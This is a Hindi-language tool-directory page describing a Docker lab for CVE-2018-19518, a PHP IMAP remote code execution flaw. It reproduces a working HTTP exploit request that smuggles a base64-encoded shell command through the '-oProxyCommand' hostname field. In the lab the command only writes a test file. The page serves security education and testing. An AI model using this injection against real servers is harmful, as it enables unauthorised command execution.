Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-19518 — PHP IMAP एक्सटेंशन के माध्यम से CVE-2018-19518 RCE एक्सप्लॉइट प्रदर्शित करने वाला डॉकर-आधारित प्रयोगशाला वातावरण, शैक्षिक परीक्षण के लिए चरण-दर-चरण उपयोग और WAF एकीकरण के साथ। | Kitploit
उपकरण/GitHubGitHub/ensimag-security/cve-2018-19518
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubensimag-security/cve-2018-19518

CVE-2018-19518

PHP IMAP एक्सटेंशन के माध्यम से CVE-2018-19518 RCE एक्सप्लॉइट प्रदर्शित करने वाला डॉकर-आधारित प्रयोगशाला वातावरण, शैक्षिक परीक्षण के लिए चरण-दर-चरण उपयोग और WAF एकीकरण के साथ।

रिपॉजिटरी देखें
117 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-19518

अंतिम रिपोर्ट यहाँ : https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF

उपयोग

ऐप चलाएँ

root@kitploit:~
docker-compose up -d

वेब ऐप के लिए सामान्य उपयोग का उदाहरण।

  • imap : webmail.grenoble-inp.org
  • user : [email protected]
  • password : xxx

शोषण

का उपयोग करते हुए echo '1234567890'>/tmp/test0001.

root@kitploit:~
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222

जाँच

docker-compose exec app bash और फ़ाइल पढ़ें cat /tmp/test0001:

waf

  • https://github.com/theonemule/docker-waf

प्रासंगिक कमिट

  • https://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb

संदर्भ

  • https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
  • https://nvd.nist.gov/vuln/detail/CVE-2018-19518
  • https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb
टूल डाउनलोड करें